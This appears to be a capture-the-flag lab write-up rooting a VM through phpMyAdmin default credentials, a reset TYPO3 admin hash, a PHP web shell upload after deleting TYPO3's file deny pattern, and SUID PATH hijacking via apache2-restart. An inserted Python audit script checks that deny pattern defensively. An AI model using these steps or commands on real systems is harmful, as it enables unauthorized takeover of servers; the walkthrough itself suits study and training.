We start by scanning the host with nmap -A -T4 -p- 192.168.1.11 -vv

Running dirb against port 80 and port 8081 returned the following results:

The page http://192.168.1.11/phpmyadmin/index.php is the main login page, and the credentials root:root let us in to take a look:

The TYPO3 database has 2 users, one of which is the admin:

We cannot crack the admin password because it is an Argon2 hash, but we can change it. Searching Google, we found a website that we can use to generate the hash for a password of our own:

Now let’s replace the admin password with the one we generated:

Visit http://192.168.1.11/typo3/index.php and log in as admin with the password hacker:


I tried to upload a shell.php file, but the site is configured to reject PHP uploads. To change that, go to Settings, click Configure Installation-Wide Options, type php in the search box, and delete the following line from [BE][fileDenyPattern]:

\.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
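As an added example (not part of the original write-up and not TYPO3's own code), this Python check lets an administrator confirm that the configured [BE][fileDenyPattern] still rejects executable upload names. The sample file names, the function names and the case-insensitive matching are assumptions made for the illustration.

```python
import re

# Deny pattern quoted in the write-up for [BE][fileDenyPattern].
DEFAULT_DENY = r"\.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$"

# Constructed sample names: uploads that must be rejected and ones that must pass.
MUST_BLOCK = ["shell.php", "shell.PHP", "x.php7", "x.phtml", "x.phar",
              "x.php.jpg", "a.cgi", "run.pl", ".htaccess"]
MUST_ALLOW = ["report.pdf", "logo.png", "notes.txt"]


def is_denied(pattern, filename):
    """True if filename matches the deny pattern (case-insensitive: assumption).

    An empty pattern denies nothing, which is the state the write-up creates.
    """
    if not pattern:
        return False
    return re.search(pattern, filename, re.IGNORECASE) is not None


def audit(pattern):
    """Return (finding, filename) pairs for a configured fileDenyPattern."""
    findings = []
    for name in MUST_BLOCK:
        if not is_denied(pattern, name):
            findings.append(("executable-upload-allowed", name))
    for name in MUST_ALLOW:
        if is_denied(pattern, name):
            findings.append(("benign-upload-blocked", name))
    return findings


if __name__ == "__main__":
    # Constructed configurations: the default, an emptied value, a trimmed value.
    configs = {"default": DEFAULT_DENY, "emptied": "",
               "trimmed": r"\.(shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$"}
    for label, pattern in configs.items():
        result = audit(pattern)
        print(label, "OK" if not result else result)
```

Running the audit against the value exported from the live configuration, and alerting on any finding, catches an emptied or trimmed pattern before it is noticed through an uploaded file.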

Next, go to Filelist and upload the shell.php file. I uploaded it to the user folder:

Now open the file to get a shell back. Make sure your machine is ready with a listening port first:

I tried to exploit the kernel and the system, but no exploit worked. Running find / -perm -u=s -type f 2>/dev/null to list SUID files turned up a file named apache2-restart:

We are going to abuse this file by placing our own executable named service ahead of the real one in PATH:

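cd /tmp
# create a file named service that starts bash
echo "/bin/bash" > service
chmod +x service
# put /tmp first so it is searched before the system directories
export PATH=/tmp/:$PATH
# run the SUID file found above
apache2-restart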

Now we are root, so let’s grab the flag:
